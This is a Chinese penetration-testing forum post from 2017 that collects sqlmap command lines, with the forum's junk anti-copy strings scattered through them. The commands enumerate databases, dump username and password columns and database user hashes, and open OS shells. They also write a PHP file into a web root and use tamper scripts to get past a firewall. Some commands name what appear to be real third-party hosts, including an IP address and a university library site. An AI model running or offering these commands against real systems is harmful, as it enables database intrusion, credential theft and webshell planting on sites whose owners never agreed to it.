中国网络渗透测试联盟

标题: sqlmap使用实例 [打印本页]

作者: admin    时间: 2017-5-19 17:03
标题: sqlmap使用实例
/pentest/database/sqlmap
0 z! z" r' S5 v) T7 E
" o1 s+ e. [7 D7 T4 `6 Tupdate :::::>     in the folder   after  execute    following   order : svn update
) |7 j* u  z, U, C; S! _; r7 w8 \+ o' `  ~5 q+ p: J' J
sqlmap.py -r 1.txt --current-db
3 a. C4 P3 o  z+ Y
0 M, h, b6 x. hv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
: n- t. _  X( {- U
0 `; F5 J5 z. {4 i==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
; j. Q9 m/ {8 V% V+ U猜解数据库+ \. U6 m* i' \) b8 J& l+ [
./sqlmap.py -u "injection-url" --dbs" L7 B6 M2 [# ]9 G$ Y3 w
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"9 @1 r% `! g  e; ?. O* A

' h1 F! B0 f8 T& E( r6 r% s" Q猜解表名
* T# [- B4 M, n) x./sqlmap.py -u "injection-url" -D database_name --tables
( K9 E1 Y' v  T; e: d. t+ a& R- T9 l+ M- ?* D- y: }
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"! P& f7 K4 T0 G0 ?0 Z0 T& R
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
0 ?( R+ I; a3 \3 @) F2 T* u) [' ]4 _& X' J5 i6 t( ?
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump" W5 q0 I" u! Y# q$ o9 d. U
1 Q' R  B1 {- P, \- S7 R
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
8 U8 f3 I! p9 U5 a1 `) }% V7 u+ Qsqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
. a( U6 \. d; G, h+ csqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" 0 E% h" q: a/ W7 L8 \
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py": g3 \5 e* f  J

) T; B: a5 _# Qsqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
, D) `' c" q9 W" Tsqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"0 @7 l4 l% F" I
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
8 \, O7 F; g2 `- v4 p$ Zsqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
* S& Y* y* M; B; Esqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump2 w; C1 z4 x' z8 O* w9 S

* t: E, C; F+ x* q/ B( Fsqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了% o2 j9 s1 _0 k; t9 q$ ~
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
: R$ Y. _0 L, I" h1 _) i9 W8 Y& p5 U% l/ O& L' g. Y
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
0 q8 L$ k: s- g$ r" T, V9 r猜解列名
% G0 _8 J5 ]& ~9 v./sqlmap.py -u "injection-url" -D database_name -T table_name --columns+ E* F" F- @% S, E0 d$ t
! ~0 ^0 Q7 x: x  L, t  H7 S
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
6 x/ k& s% R( }1 _( ]sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
! U: o' T! w" ]3 p/ z- w% l: osqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
% w# b* x+ t, j& d# M* W6 `/ j2 K% N- B+ h
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"1 p: ?: T3 r" j
&submit=Go
1 s9 E$ E7 }+ |: r猜解值, l6 C1 G$ w2 o+ }- O. x3 ]
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
+ h1 i3 S$ z6 A' Y3 {========================================================  N3 P1 ^! K' }
搜索表名中包括mana字符的  y) R5 g, ]- {4 G; g
/sqlmap.py -u "injection-url" -T mana --search; g; ]1 M  A1 |3 `
返回一个交互式sql shell1 x* S5 C7 b3 Y) z9 m
/sqlmap.py -u "injection-url" --sql-shell
* w4 k- Z: X, m( C, ^6 L读取指定文件(需权限)
, _2 U# E  K# {: D7 r* O. \/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
, g! Z; k( R1 D' [, f! b查看当前 用户 及 数据库   X+ L* D, b2 k
/sqlmap.py -u "injection-url" --current-user --current-db
, E1 o' {* ^" a4 O& }, Y本地文件 写入 远程目标绝对路径/ S6 H2 t0 F9 j- a
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
+ j6 W% w# ?' j  _% msqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
" H1 t2 N; M, ]- I3 x. m
4 N5 V! w& X8 S# zsqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径5 B; m- M# G! ^
查看某用的权限: ~  U, [, J; k2 u) p
/sqlmap.py -u "injection-url" --privileges -U root
9 e" ^5 }" `' R+ _6 G# G  |' b查看当前用户是否为dba
) I9 X; a. q; ~( Y4 Z8 H0 Q/sqlmap.py -u "injection-url" --is-dba0 |4 O7 _9 l/ i$ P- V+ X
读取所有数据库用户或指定数据库用户的密码  t0 \' X7 Y5 \1 w, q, i/ F
sqlmap.py -r 1.txt --users --passwords0 g& s9 {/ s( M3 r! |
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" 1 [% Y9 c5 o& |
' w. g  r2 Z3 a: k! @! W$ u
/sqlmap.py -u "injection-url" --passwords -U root( p2 Z: u1 O# U! o: O

% \) O( r6 `% B! F$ K--start&&--stop 与 --first&&--last 的区别8 T9 j. @- l# \4 s$ a
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
/ T+ O! n5 p' E  n- X+ g8 f6 b. u# P; E
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)- a% T8 R( i% r) J  i: F3 \9 ]
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
* t, o) r& Z* L# U$ J' g5 N4 r/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
7 n3 X0 H8 K+ E1 M0 r0 O
6 r4 z/ o1 s" h% E7 X3 J& C+ W2 q执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)" x3 E- V- z6 n) K# u- d
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"9 [$ w. w) h- L; N% t
  B: L( {' R) [5 r* C# d, m% O





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2